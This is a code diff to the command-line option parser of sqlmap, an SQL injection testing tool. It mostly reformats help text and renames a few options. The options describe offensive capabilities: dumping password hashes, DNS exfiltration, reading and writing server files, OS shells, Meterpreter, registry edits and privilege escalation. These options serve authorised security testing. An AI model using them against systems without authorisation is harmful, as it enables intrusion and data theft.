request.add_option("--safe-freq", dest="safeFreq", type="int",
|
||||||
help="Test requests between two visits to a given safe URL")
|
help="Test requests between two visits to a given safe URL")
|
||||||
|
|
||||||
request.add_option("--skip-urlencode", dest="skipUrlEncode",
|
request.add_option("--skip-urlencode", dest="skipUrlEncode", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Skip URL encoding of payload data")
|
help="Skip URL encoding of payload data")
|
||||||
|
|
||||||
request.add_option("--csrf-token", dest="csrfToken",
|
request.add_option("--csrf-token", dest="csrfToken",
|
||||||
help="Parameter used to hold anti-CSRF token")
|
help="Parameter used to hold anti-CSRF token")
|
||||||
|
|
||||||
request.add_option("--csrf-url", dest="csrfUrl",
|
request.add_option("--csrf-url", dest="csrfUrl",
|
||||||
help="URL address to visit to extract anti-CSRF token")
|
help="URL address to visit for extraction of anti-CSRF token")
|
||||||
|
|
||||||
request.add_option("--force-ssl", dest="forceSSL",
|
request.add_option("--force-ssl", dest="forceSSL", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Force usage of SSL/HTTPS")
|
help="Force usage of SSL/HTTPS")
|
||||||
|
|
||||||
request.add_option("--hpp", dest="hpp",
|
request.add_option("--hpp", dest="hpp", action="store_true",
|
||||||
action="store_true",
|
help="Use HTTP parameter pollution method")
|
||||||
help="Use HTTP parameter pollution method")
|
|
||||||
|
|
||||||
request.add_option("--eval", dest="evalCode",
|
request.add_option("--eval", dest="evalCode",
|
||||||
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
|
help="Evaluate provided Python code before the request (e.g. \"import hashlib;id2=hashlib.md5(id).hexdigest()\")")
|
||||||
|
|
||||||
# Optimization options
|
# Optimization options
|
||||||
optimization = OptionGroup(parser, "Optimization", "These "
|
optimization = OptionGroup(parser, "Optimization", "These options can be used to optimize the performance of sqlmap")
|
||||||
"options can be used to optimize the "
|
|
||||||
"performance of sqlmap")
|
|
||||||
|
|
||||||
optimization.add_option("-o", dest="optimize",
|
optimization.add_option("-o", dest="optimize", action="store_true",
|
||||||
action="store_true",
|
help="Turn on all optimization switches")
|
||||||
help="Turn on all optimization switches")
|
|
||||||
|
|
||||||
optimization.add_option("--predict-output", dest="predictOutput", action="store_true",
|
optimization.add_option("--predict-output", dest="predictOutput", action="store_true",
|
||||||
help="Predict common queries output")
|
help="Predict common queries output")
|
||||||
|
|
||||||
optimization.add_option("--keep-alive", dest="keepAlive", action="store_true",
|
optimization.add_option("--keep-alive", dest="keepAlive", action="store_true",
|
||||||
help="Use persistent HTTP(s) connections")
|
help="Use persistent HTTP(s) connections")
|
||||||
|
|
||||||
optimization.add_option("--null-connection", dest="nullConnection", action="store_true",
|
optimization.add_option("--null-connection", dest="nullConnection", action="store_true",
|
||||||
help="Retrieve page length without actual HTTP response body")
|
help="Retrieve page length without actual HTTP response body")
|
||||||
|
|
||||||
optimization.add_option("--threads", dest="threads", type="int",
|
optimization.add_option("--threads", dest="threads", type="int",
|
||||||
help="Max number of concurrent HTTP(s) "
|
help="Max number of concurrent HTTP(s) "
|
||||||
"requests (default %d)" % defaults.threads)
|
"requests (default %d)" % defaults.threads)
|
||||||
|
|
||||||
# Injection options
|
# Injection options
|
||||||
injection = OptionGroup(parser, "Injection", "These options can be "
|
injection = OptionGroup(parser, "Injection", "These options can be used to specify which parameters to test for, provide custom injection payloads and optional tampering scripts")
|
||||||
"used to specify which parameters to test "
|
|
||||||
"for, provide custom injection payloads and "
|
|
||||||
"optional tampering scripts")
|
|
||||||
|
|
||||||
injection.add_option("-p", dest="testParameter",
|
injection.add_option("-p", dest="testParameter",
|
||||||
help="Testable parameter(s)")
|
help="Testable parameter(s)")
|
||||||
@@ -270,36 +252,30 @@ def cmdLineParser(argv=None):
|
|||||||
help="Skip testing parameters that not appear to be dynamic")
|
help="Skip testing parameters that not appear to be dynamic")
|
||||||
|
|
||||||
injection.add_option("--param-exclude", dest="paramExclude",
|
injection.add_option("--param-exclude", dest="paramExclude",
|
||||||
help="Regexp to exclude parameters from testing (e.g. \"ses\")")
|
help="Regexp to exclude parameters from testing (e.g. \"ses\")")
|
||||||
|
|
||||||
injection.add_option("--dbms", dest="dbms",
|
injection.add_option("--dbms", dest="dbms",
|
||||||
help="Force back-end DBMS to this value")
|
help="Force back-end DBMS to provided value")
|
||||||
|
|
||||||
injection.add_option("--dbms-cred", dest="dbmsCred",
|
injection.add_option("--dbms-cred", dest="dbmsCred",
|
||||||
help="DBMS authentication credentials (user:password)")
|
help="DBMS authentication credentials (user:password)")
|
||||||
|
|
||||||
injection.add_option("--os", dest="os",
|
injection.add_option("--os", dest="os",
|
||||||
help="Force back-end DBMS operating system "
|
help="Force back-end DBMS operating system to provided value")
|
||||||
"to this value")
|
|
||||||
|
|
||||||
injection.add_option("--invalid-bignum", dest="invalidBignum",
|
injection.add_option("--invalid-bignum", dest="invalidBignum", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use big numbers for invalidating values")
|
help="Use big numbers for invalidating values")
|
||||||
|
|
||||||
injection.add_option("--invalid-logical", dest="invalidLogical",
|
injection.add_option("--invalid-logical", dest="invalidLogical", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use logical operations for invalidating values")
|
help="Use logical operations for invalidating values")
|
||||||
|
|
||||||
injection.add_option("--invalid-string", dest="invalidString",
|
injection.add_option("--invalid-string", dest="invalidString", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Use random strings for invalidating values")
|
help="Use random strings for invalidating values")
|
||||||
|
|
||||||
injection.add_option("--no-cast", dest="noCast",
|
injection.add_option("--no-cast", dest="noCast", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Turn off payload casting mechanism")
|
help="Turn off payload casting mechanism")
|
||||||
|
|
||||||
injection.add_option("--no-escape", dest="noEscape",
|
injection.add_option("--no-escape", dest="noEscape", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Turn off string escaping mechanism")
|
help="Turn off string escaping mechanism")
|
||||||
|
|
||||||
injection.add_option("--prefix", dest="prefix",
|
injection.add_option("--prefix", dest="prefix",
|
||||||
@@ -312,54 +288,40 @@ def cmdLineParser(argv=None):
|
|||||||
help="Use given script(s) for tampering injection data")
|
help="Use given script(s) for tampering injection data")
|
||||||
|
|
||||||
# Detection options
|
# Detection options
|
||||||
detection = OptionGroup(parser, "Detection", "These options can be "
|
detection = OptionGroup(parser, "Detection", "These options can be used to customize the detection phase")
|
||||||
"used to customize the detection phase")
|
|
||||||
|
|
||||||
detection.add_option("--level", dest="level", type="int",
|
detection.add_option("--level", dest="level", type="int",
|
||||||
help="Level of tests to perform (1-5, "
|
help="Level of tests to perform (1-5, default %d)" % defaults.level)
|
||||||
"default %d)" % defaults.level)
|
|
||||||
|
|
||||||
detection.add_option("--risk", dest="risk", type="int",
|
detection.add_option("--risk", dest="risk", type="int",
|
||||||
help="Risk of tests to perform (1-3, "
|
help="Risk of tests to perform (1-3, default %d)" % defaults.risk)
|
||||||
"default %d)" % defaults.risk)
|
|
||||||
|
|
||||||
detection.add_option("--string", dest="string",
|
detection.add_option("--string", dest="string",
|
||||||
help="String to match when "
|
help="String to match when query is evaluated to True")
|
||||||
"query is evaluated to True")
|
|
||||||
|
|
||||||
detection.add_option("--not-string", dest="notString",
|
detection.add_option("--not-string", dest="notString",
|
||||||
help="String to match when "
|
help="String to match when query is evaluated to False")
|
||||||
"query is evaluated to False")
|
|
||||||
|
|
||||||
detection.add_option("--regexp", dest="regexp",
|
detection.add_option("--regexp", dest="regexp",
|
||||||
help="Regexp to match when "
|
help="Regexp to match when query is evaluated to True")
|
||||||
"query is evaluated to True")
|
|
||||||
|
|
||||||
detection.add_option("--code", dest="code", type="int",
|
detection.add_option("--code", dest="code", type="int",
|
||||||
help="HTTP code to match when "
|
help="HTTP code to match when query is evaluated to True")
|
||||||
"query is evaluated to True")
|
|
||||||
|
|
||||||
detection.add_option("--text-only", dest="textOnly",
|
detection.add_option("--text-only", dest="textOnly", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Compare pages based only on the textual content")
|
help="Compare pages based only on the textual content")
|
||||||
|
|
||||||
detection.add_option("--titles", dest="titles",
|
detection.add_option("--titles", dest="titles", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Compare pages based only on their titles")
|
help="Compare pages based only on their titles")
|
||||||
|
|
||||||
# Techniques options
|
# Techniques options
|
||||||
techniques = OptionGroup(parser, "Techniques", "These options can be "
|
techniques = OptionGroup(parser, "Techniques", "These options can be used to tweak testing of specific SQL injection techniques")
|
||||||
"used to tweak testing of specific SQL "
|
|
||||||
"injection techniques")
|
|
||||||
|
|
||||||
techniques.add_option("--technique", dest="tech",
|
techniques.add_option("--technique", dest="tech",
|
||||||
help="SQL injection techniques to use "
|
help="SQL injection techniques to use (default \"%s\")" % defaults.tech)
|
||||||
"(default \"%s\")" % defaults.tech)
|
|
||||||
|
|
||||||
techniques.add_option("--time-sec", dest="timeSec",
|
techniques.add_option("--time-sec", dest="timeSec", type="int",
|
||||||
type="int",
|
help="Seconds to delay the DBMS response (default %d)" % defaults.timeSec)
|
||||||
help="Seconds to delay the DBMS response "
|
|
||||||
"(default %d)" % defaults.timeSec)
|
|
||||||
|
|
||||||
techniques.add_option("--union-cols", dest="uCols",
|
techniques.add_option("--union-cols", dest="uCols",
|
||||||
help="Range of columns to test for UNION query SQL injection")
|
help="Range of columns to test for UNION query SQL injection")
|
||||||
@@ -373,59 +335,49 @@ def cmdLineParser(argv=None):
|
|||||||
techniques.add_option("--dns-domain", dest="dnsDomain",
|
techniques.add_option("--dns-domain", dest="dnsDomain",
|
||||||
help="Domain name used for DNS exfiltration attack")
|
help="Domain name used for DNS exfiltration attack")
|
||||||
|
|
||||||
techniques.add_option("--second-order", dest="secondOrder",
|
techniques.add_option("--second-url", dest="secondUrl",
|
||||||
help="Resulting page URL searched for second-order "
|
help="Resulting page URL searched for second-order response")
|
||||||
"response")
|
|
||||||
|
techniques.add_option("--second-req", dest="secondReq",
|
||||||
|
help="Load second-order HTTP request from file")
|
||||||
|
|
||||||
# Fingerprint options
|
# Fingerprint options
|
||||||
fingerprint = OptionGroup(parser, "Fingerprint")
|
fingerprint = OptionGroup(parser, "Fingerprint")
|
||||||
|
|
||||||
fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp",
|
fingerprint.add_option("-f", "--fingerprint", dest="extensiveFp", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Perform an extensive DBMS version fingerprint")
|
help="Perform an extensive DBMS version fingerprint")
|
||||||
|
|
||||||
# Enumeration options
|
# Enumeration options
|
||||||
enumeration = OptionGroup(parser, "Enumeration", "These options can "
|
enumeration = OptionGroup(parser, "Enumeration", "These options can be used to enumerate the back-end database management system information, structure and data contained in the tables. Moreover you can run your own SQL statements")
|
||||||
"be used to enumerate the back-end database "
|
|
||||||
"management system information, structure "
|
|
||||||
"and data contained in the tables. Moreover "
|
|
||||||
"you can run your own SQL statements")
|
|
||||||
|
|
||||||
enumeration.add_option("-a", "--all", dest="getAll",
|
enumeration.add_option("-a", "--all", dest="getAll", action="store_true",
|
||||||
action="store_true", help="Retrieve everything")
|
help="Retrieve everything")
|
||||||
|
|
||||||
enumeration.add_option("-b", "--banner", dest="getBanner",
|
enumeration.add_option("-b", "--banner", dest="getBanner", action="store_true",
|
||||||
action="store_true", help="Retrieve DBMS banner")
|
help="Retrieve DBMS banner")
|
||||||
|
|
||||||
enumeration.add_option("--current-user", dest="getCurrentUser",
|
enumeration.add_option("--current-user", dest="getCurrentUser", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Retrieve DBMS current user")
|
help="Retrieve DBMS current user")
|
||||||
|
|
||||||
enumeration.add_option("--current-db", dest="getCurrentDb",
|
enumeration.add_option("--current-db", dest="getCurrentDb", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Retrieve DBMS current database")
|
help="Retrieve DBMS current database")
|
||||||
|
|
||||||
enumeration.add_option("--hostname", dest="getHostname",
|
enumeration.add_option("--hostname", dest="getHostname", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Retrieve DBMS server hostname")
|
help="Retrieve DBMS server hostname")
|
||||||
|
|
||||||
enumeration.add_option("--is-dba", dest="isDba",
|
enumeration.add_option("--is-dba", dest="isDba", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Detect if the DBMS current user is DBA")
|
help="Detect if the DBMS current user is DBA")
|
||||||
|
|
||||||
enumeration.add_option("--users", dest="getUsers", action="store_true",
|
enumeration.add_option("--users", dest="getUsers", action="store_true",
|
||||||
help="Enumerate DBMS users")
|
help="Enumerate DBMS users")
|
||||||
|
|
||||||
enumeration.add_option("--passwords", dest="getPasswordHashes",
|
enumeration.add_option("--passwords", dest="getPasswordHashes", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Enumerate DBMS users password hashes")
|
help="Enumerate DBMS users password hashes")
|
||||||
|
|
||||||
enumeration.add_option("--privileges", dest="getPrivileges",
|
enumeration.add_option("--privileges", dest="getPrivileges", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Enumerate DBMS users privileges")
|
help="Enumerate DBMS users privileges")
|
||||||
|
|
||||||
enumeration.add_option("--roles", dest="getRoles",
|
enumeration.add_option("--roles", dest="getRoles", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Enumerate DBMS users roles")
|
help="Enumerate DBMS users roles")
|
||||||
|
|
||||||
enumeration.add_option("--dbs", dest="getDbs", action="store_true",
|
enumeration.add_option("--dbs", dest="getDbs", action="store_true",
|
||||||
@@ -453,7 +405,7 @@ def cmdLineParser(argv=None):
|
|||||||
help="Search column(s), table(s) and/or database name(s)")
|
help="Search column(s), table(s) and/or database name(s)")
|
||||||
|
|
||||||
enumeration.add_option("--comments", dest="getComments", action="store_true",
|
enumeration.add_option("--comments", dest="getComments", action="store_true",
|
||||||
help="Retrieve DBMS comments")
|
help="Check for DBMS comments during enumeration")
|
||||||
|
|
||||||
enumeration.add_option("-D", dest="db",
|
enumeration.add_option("-D", dest="db",
|
||||||
help="DBMS database to enumerate")
|
help="DBMS database to enumerate")
|
||||||
@@ -464,16 +416,14 @@ def cmdLineParser(argv=None):
|
|||||||
enumeration.add_option("-C", dest="col",
|
enumeration.add_option("-C", dest="col",
|
||||||
help="DBMS database table column(s) to enumerate")
|
help="DBMS database table column(s) to enumerate")
|
||||||
|
|
||||||
enumeration.add_option("-X", dest="excludeCol",
|
enumeration.add_option("-X", dest="exclude",
|
||||||
help="DBMS database table column(s) to not enumerate")
|
help="DBMS database identifier(s) to not enumerate")
|
||||||
|
|
||||||
enumeration.add_option("-U", dest="user",
|
enumeration.add_option("-U", dest="user",
|
||||||
help="DBMS user to enumerate")
|
help="DBMS user to enumerate")
|
||||||
|
|
||||||
enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs",
|
enumeration.add_option("--exclude-sysdbs", dest="excludeSysDbs", action="store_true",
|
||||||
action="store_true",
|
help="Exclude DBMS system databases when enumerating tables")
|
||||||
help="Exclude DBMS system databases when "
|
|
||||||
"enumerating tables")
|
|
||||||
|
|
||||||
enumeration.add_option("--pivot-column", dest="pivotColumn",
|
enumeration.add_option("--pivot-column", dest="pivotColumn",
|
||||||
help="Pivot column name")
|
help="Pivot column name")
|
||||||
@@ -496,28 +446,23 @@ def cmdLineParser(argv=None):
|
|||||||
enumeration.add_option("--sql-query", dest="query",
|
enumeration.add_option("--sql-query", dest="query",
|
||||||
help="SQL statement to be executed")
|
help="SQL statement to be executed")
|
||||||
|
|
||||||
enumeration.add_option("--sql-shell", dest="sqlShell",
|
enumeration.add_option("--sql-shell", dest="sqlShell", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Prompt for an interactive SQL shell")
|
help="Prompt for an interactive SQL shell")
|
||||||
|
|
||||||
enumeration.add_option("--sql-file", dest="sqlFile",
|
enumeration.add_option("--sql-file", dest="sqlFile",
|
||||||
help="Execute SQL statements from given file(s)")
|
help="Execute SQL statements from given file(s)")
|
||||||
|
|
||||||
# Brute force options
|
# Brute force options
|
||||||
brute = OptionGroup(parser, "Brute force", "These "
|
brute = OptionGroup(parser, "Brute force", "These options can be used to run brute force checks")
|
||||||
"options can be used to run brute force "
|
|
||||||
"checks")
|
|
||||||
|
|
||||||
brute.add_option("--common-tables", dest="commonTables", action="store_true",
|
brute.add_option("--common-tables", dest="commonTables", action="store_true",
|
||||||
help="Check existence of common tables")
|
help="Check existence of common tables")
|
||||||
|
|
||||||
brute.add_option("--common-columns", dest="commonColumns", action="store_true",
|
brute.add_option("--common-columns", dest="commonColumns", action="store_true",
|
||||||
help="Check existence of common columns")
|
help="Check existence of common columns")
|
||||||
|
|
||||||
# User-defined function options
|
# User-defined function options
|
||||||
udf = OptionGroup(parser, "User-defined function injection", "These "
|
udf = OptionGroup(parser, "User-defined function injection", "These options can be used to create custom user-defined functions")
|
||||||
"options can be used to create custom user-defined "
|
|
||||||
"functions")
|
|
||||||
|
|
||||||
udf.add_option("--udf-inject", dest="udfInject", action="store_true",
|
udf.add_option("--udf-inject", dest="udfInject", action="store_true",
|
||||||
help="Inject custom user-defined functions")
|
help="Inject custom user-defined functions")
|
||||||
@@ -526,167 +471,131 @@ def cmdLineParser(argv=None):
|
|||||||
help="Local path of the shared library")
|
help="Local path of the shared library")
|
||||||
|
|
||||||
# File system options
|
# File system options
|
||||||
filesystem = OptionGroup(parser, "File system access", "These options "
|
filesystem = OptionGroup(parser, "File system access", "These options can be used to access the back-end database management system underlying file system")
|
||||||
"can be used to access the back-end database "
|
|
||||||
"management system underlying file system")
|
|
||||||
|
|
||||||
filesystem.add_option("--file-read", dest="rFile",
|
filesystem.add_option("--file-read", dest="fileRead",
|
||||||
help="Read a file from the back-end DBMS "
|
help="Read a file from the back-end DBMS file system")
|
||||||
"file system")
|
|
||||||
|
|
||||||
filesystem.add_option("--file-write", dest="wFile",
|
filesystem.add_option("--file-write", dest="fileWrite",
|
||||||
help="Write a local file on the back-end "
|
help="Write a local file on the back-end DBMS file system")
|
||||||
"DBMS file system")
|
|
||||||
|
|
||||||
filesystem.add_option("--file-dest", dest="dFile",
|
filesystem.add_option("--file-dest", dest="fileDest",
|
||||||
help="Back-end DBMS absolute filepath to "
|
help="Back-end DBMS absolute filepath to write to")
|
||||||
"write to")
|
|
||||||
|
|
||||||
# Takeover options
|
# Takeover options
|
||||||
takeover = OptionGroup(parser, "Operating system access", "These "
|
takeover = OptionGroup(parser, "Operating system access", "These options can be used to access the back-end database management system underlying operating system")
|
||||||
"options can be used to access the back-end "
|
|
||||||
"database management system underlying "
|
|
||||||
"operating system")
|
|
||||||
|
|
||||||
takeover.add_option("--os-cmd", dest="osCmd",
|
takeover.add_option("--os-cmd", dest="osCmd",
|
||||||
help="Execute an operating system command")
|
help="Execute an operating system command")
|
||||||
|
|
||||||
takeover.add_option("--os-shell", dest="osShell",
|
takeover.add_option("--os-shell", dest="osShell", action="store_true",
|
||||||
action="store_true",
|
help="Prompt for an interactive operating system shell")
|
||||||
help="Prompt for an interactive operating "
|
|
||||||
"system shell")
|
|
||||||
|
|
||||||
takeover.add_option("--os-pwn", dest="osPwn",
|
takeover.add_option("--os-pwn", dest="osPwn", action="store_true",
|
||||||
action="store_true",
|
help="Prompt for an OOB shell, Meterpreter or VNC")
|
||||||
help="Prompt for an OOB shell, "
|
|
||||||
"Meterpreter or VNC")
|
|
||||||
|
|
||||||
takeover.add_option("--os-smbrelay", dest="osSmb",
|
takeover.add_option("--os-smbrelay", dest="osSmb", action="store_true",
|
||||||
action="store_true",
|
help="One click prompt for an OOB shell, Meterpreter or VNC")
|
||||||
help="One click prompt for an OOB shell, "
|
|
||||||
"Meterpreter or VNC")
|
|
||||||
|
|
||||||
takeover.add_option("--os-bof", dest="osBof",
|
takeover.add_option("--os-bof", dest="osBof", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Stored procedure buffer overflow "
|
help="Stored procedure buffer overflow "
|
||||||
"exploitation")
|
"exploitation")
|
||||||
|
|
||||||
takeover.add_option("--priv-esc", dest="privEsc",
|
takeover.add_option("--priv-esc", dest="privEsc", action="store_true",
|
||||||
action="store_true",
|
|
||||||
help="Database process user privilege escalation")
|
help="Database process user privilege escalation")
|
||||||
|
|
||||||
takeover.add_option("--msf-path", dest="msfPath",
|
takeover.add_option("--msf-path", dest="msfPath",
|
||||||
help="Local path where Metasploit Framework "
|
help="Local path where Metasploit Framework is installed")
|
||||||
"is installed")
|
|
||||||
|
|
||||||
takeover.add_option("--tmp-path", dest="tmpPath",
|
takeover.add_option("--tmp-path", dest="tmpPath",
|
||||||
help="Remote absolute path of temporary files "
|
help="Remote absolute path of temporary files directory")
|
||||||
"directory")
|
|
||||||
|
|
||||||
# Windows registry options
|
# Windows registry options
|
||||||
windows = OptionGroup(parser, "Windows registry access", "These "
|
windows = OptionGroup(parser, "Windows registry access", "These options can be used to access the back-end database management system Windows registry")
|
||||||
"options can be used to access the back-end "
|
|
||||||
"database management system Windows "
|
|
||||||
"registry")
|
|
||||||
|
|
||||||
windows.add_option("--reg-read", dest="regRead",
|
windows.add_option("--reg-read", dest="regRead", action="store_true",
|
||||||
action="store_true",
|
help="Read a Windows registry key value")
|
||||||
help="Read a Windows registry key value")
|
|
||||||
|
|
||||||
windows.add_option("--reg-add", dest="regAdd",
|
windows.add_option("--reg-add", dest="regAdd", action="store_true",
|
||||||
action="store_true",
|
help="Write a Windows registry key value data")
|
||||||
help="Write a Windows registry key value data")
|
|
||||||
|
|
||||||
windows.add_option("--reg-del", dest="regDel",
|
windows.add_option("--reg-del", dest="regDel", action="store_true",
|
||||||
action="store_true",
|
help="Delete a Windows registry key value")
|
||||||
help="Delete a Windows registry key value")
|
|
||||||
|
|
||||||
windows.add_option("--reg-key", dest="regKey",
|
windows.add_option("--reg-key", dest="regKey",
|
||||||
help="Windows registry key")
|
help="Windows registry key")
|
||||||
|
|
||||||
windows.add_option("--reg-value", dest="regVal",
|
windows.add_option("--reg-value", dest="regVal",
|
||||||
help="Windows registry key value")
|
help="Windows registry key value")
|
||||||
|
|
||||||
windows.add_option("--reg-data", dest="regData",
|
windows.add_option("--reg-data", dest="regData",
|
||||||
help="Windows registry key value data")
|
help="Windows registry key value data")
|
||||||
|
|
||||||
windows.add_option("--reg-type", dest="regType",
|
windows.add_option("--reg-type", dest="regType",
|
||||||
help="Windows registry key value type")
|
help="Windows registry key value type")
|
||||||
|
|
||||||
# General options
|
# General options
|
||||||
general = OptionGroup(parser, "General", "These options can be used "
|
general = OptionGroup(parser, "General", "These options can be used to set some general working parameters")
|
||||||
"to set some general working parameters")
|
|
||||||
|
|
||||||
general.add_option("-s", dest="sessionFile",
|
general.add_option("-s", dest="sessionFile",
|
||||||
help="Load session from a stored (.sqlite) file")
|
help="Load session from a stored (.sqlite) file")
|
||||||
|
|
||||||
general.add_option("-t", dest="trafficFile",
|
general.add_option("-t", dest="trafficFile",
|
||||||
help="Log all HTTP traffic into a "
|
help="Log all HTTP traffic into a textual file")
|
||||||
"textual file")
|
|
||||||
|
|
||||||
general.add_option("--batch", dest="batch",
|
general.add_option("--batch", dest="batch", action="store_true",
|
||||||
action="store_true",
|
help="Never ask for user input, use the default behavior")
|
||||||
help="Never ask for user input, use the default behaviour")
|
|
||||||
|
|
||||||
general.add_option("--binary-fields", dest="binaryFields",
|
general.add_option("--binary-fields", dest="binaryFields",
|
||||||
help="Result fields having binary values (e.g. \"digest\")")
|
help="Result fields having binary values (e.g. \"digest\")")
|
||||||
|
|
||||||
general.add_option("--check-internet", dest="checkInternet",
|
general.add_option("--check-internet", dest="checkInternet", action="store_true",
|
||||||
action="store_true",
|
help="Check Internet connection before assessing the target")
|
||||||
help="Check Internet connection before assessing the target")
|
|
||||||
|
|
||||||
general.add_option("--crawl", dest="crawlDepth", type="int",
|
general.add_option("--crawl", dest="crawlDepth", type="int",
|
||||||
help="Crawl the website starting from the target URL")
|
help="Crawl the website starting from the target URL")
|
||||||
|
|
||||||
general.add_option("--crawl-exclude", dest="crawlExclude",
|
general.add_option("--crawl-exclude", dest="crawlExclude",
|
||||||
help="Regexp to exclude pages from crawling (e.g. \"logout\")")
|
help="Regexp to exclude pages from crawling (e.g. \"logout\")")
|
||||||
|
|
||||||
general.add_option("--csv-del", dest="csvDel",
|
general.add_option("--csv-del", dest="csvDel",
|
||||||
help="Delimiting character used in CSV output "
|
help="Delimiting character used in CSV output (default \"%s\")" % defaults.csvDel)
|
||||||
"(default \"%s\")" % defaults.csvDel)
|
|
||||||
|
|
||||||
general.add_option("--charset", dest="charset",
|
general.add_option("--charset", dest="charset",
|
||||||
help="Blind SQL injection charset (e.g. \"0123456789abcdef\")")
|
help="Blind SQL injection charset (e.g. \"0123456789abcdef\")")
|
||||||
|
|
||||||
general.add_option("--dump-format", dest="dumpFormat",
|
general.add_option("--dump-format", dest="dumpFormat",
|
||||||
help="Format of dumped data (CSV (default), HTML or SQLITE)")
|
help="Format of dumped data (CSV (default), HTML or SQLITE)")
|
||||||
|
|
||||||
general.add_option("--encoding", dest="encoding",
|
general.add_option("--encoding", dest="encoding",
|
||||||
help="Character encoding used for data retrieval (e.g. GBK)")
|
help="Character encoding used for data retrieval (e.g. GBK)")
|
||||||
|
|
||||||
general.add_option("--eta", dest="eta",
|
general.add_option("--eta", dest="eta", action="store_true",
|
||||||
action="store_true",
|
help="Display for each output the estimated time of arrival")
|
||||||
help="Display for each output the estimated time of arrival")
|
|
||||||
|
|
||||||
general.add_option("--flush-session", dest="flushSession",
|
general.add_option("--flush-session", dest="flushSession", action="store_true",
|
||||||
action="store_true",
|
help="Flush session files for current target")
|
||||||
help="Flush session files for current target")
|
|
||||||
|
|
||||||
general.add_option("--forms", dest="forms",
|
general.add_option("--forms", dest="forms", action="store_true",
|
||||||
action="store_true",
|
help="Parse and test forms on target URL")
|
||||||
help="Parse and test forms on target URL")
|
|
||||||
|
|
||||||
general.add_option("--fresh-queries", dest="freshQueries",
|
general.add_option("--fresh-queries", dest="freshQueries", action="store_true",
|
||||||
action="store_true",
|
help="Ignore query results stored in session file")
|
||||||
help="Ignore query results stored in session file")
|
|
||||||
|
|
||||||
general.add_option("--har", dest="harFile",
|
general.add_option("--har", dest="harFile",
|
||||||
help="Log all HTTP traffic into a HAR file")
|
help="Log all HTTP traffic into a HAR file")
|
||||||
|
|
||||||
general.add_option("--hex", dest="hexConvert",
|
general.add_option("--hex", dest="hexConvert", action="store_true",
|
||||||
action="store_true",
|
help="Use hex conversion during data retrieval")
|
||||||
help="Use DBMS hex function(s) for data retrieval")
|
|
||||||
|
|
||||||
general.add_option("--output-dir", dest="outputDir",
|
general.add_option("--output-dir", dest="outputDir", action="store",
|
||||||
action="store",
|
help="Custom output directory path")
|
||||||
help="Custom output directory path")
|
|
||||||
|
|
||||||
general.add_option("--parse-errors", dest="parseErrors",
|
general.add_option("--parse-errors", dest="parseErrors", action="store_true",
|
||||||
action="store_true",
|
help="Parse and display DBMS error messages from responses")
|
||||||
help="Parse and display DBMS error messages from responses")
|
|
||||||
|
|
||||||
general.add_option("--save", dest="saveConfig",
|
general.add_option("--save", dest="saveConfig",
|
||||||
help="Save options to a configuration INI file")
|
help="Save options to a configuration INI file")
|
||||||
|
|
||||||
general.add_option("--scope", dest="scope",
|
general.add_option("--scope", dest="scope",
|
||||||
help="Regexp to filter targets from provided proxy log")
|
help="Regexp to filter targets from provided proxy log")
|
||||||
@@ -697,79 +606,74 @@ def cmdLineParser(argv=None):
|
|||||||
general.add_option("--test-skip", dest="testSkip",
|
general.add_option("--test-skip", dest="testSkip",
|
||||||
help="Skip tests by payloads and/or titles (e.g. BENCHMARK)")
|
help="Skip tests by payloads and/or titles (e.g. BENCHMARK)")
|
||||||
|
|
||||||
general.add_option("--update", dest="updateAll",
|
general.add_option("--update", dest="updateAll", action="store_true",
|
||||||
action="store_true",
|
help="Update sqlmap")
|
||||||
help="Update sqlmap")
|
|
||||||
|
|
||||||
# Miscellaneous options
|
# Miscellaneous options
|
||||||
miscellaneous = OptionGroup(parser, "Miscellaneous")
|
miscellaneous = OptionGroup(parser, "Miscellaneous")
|
||||||
|
|
||||||
miscellaneous.add_option("-z", dest="mnemonics",
|
miscellaneous.add_option("-z", dest="mnemonics",
|
||||||
help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")
|
help="Use short mnemonics (e.g. \"flu,bat,ban,tec=EU\")")
|
||||||
|
|
||||||
miscellaneous.add_option("--alert", dest="alert",
|
miscellaneous.add_option("--alert", dest="alert",
|
||||||
help="Run host OS command(s) when SQL injection is found")
|
help="Run host OS command(s) when SQL injection is found")
|
||||||
|
|
||||||
miscellaneous.add_option("--answers", dest="answers",
|
miscellaneous.add_option("--answers", dest="answers",
|
||||||
help="Set question answers (e.g. \"quit=N,follow=N\")")
|
help="Set predefined answers (e.g. \"quit=N,follow=N\")")
|
||||||
|
|
||||||
miscellaneous.add_option("--beep", dest="beep", action="store_true",
|
miscellaneous.add_option("--beep", dest="beep", action="store_true",
|
||||||
help="Beep on question and/or when SQL injection is found")
|
help="Beep on question and/or when SQL injection is found")
|
||||||
|
|
||||||
miscellaneous.add_option("--cleanup", dest="cleanup",
|
miscellaneous.add_option("--cleanup", dest="cleanup", action="store_true",
|
||||||
action="store_true",
|
help="Clean up the DBMS from sqlmap specific UDF and tables")
|
||||||
help="Clean up the DBMS from sqlmap specific "
|
|
||||||
"UDF and tables")
|
|
||||||
|
|
||||||
miscellaneous.add_option("--dependencies", dest="dependencies",
|
miscellaneous.add_option("--dependencies", dest="dependencies", action="store_true",
|
||||||
action="store_true",
|
help="Check for missing (optional) sqlmap dependencies")
|
||||||
help="Check for missing (non-core) sqlmap dependencies")
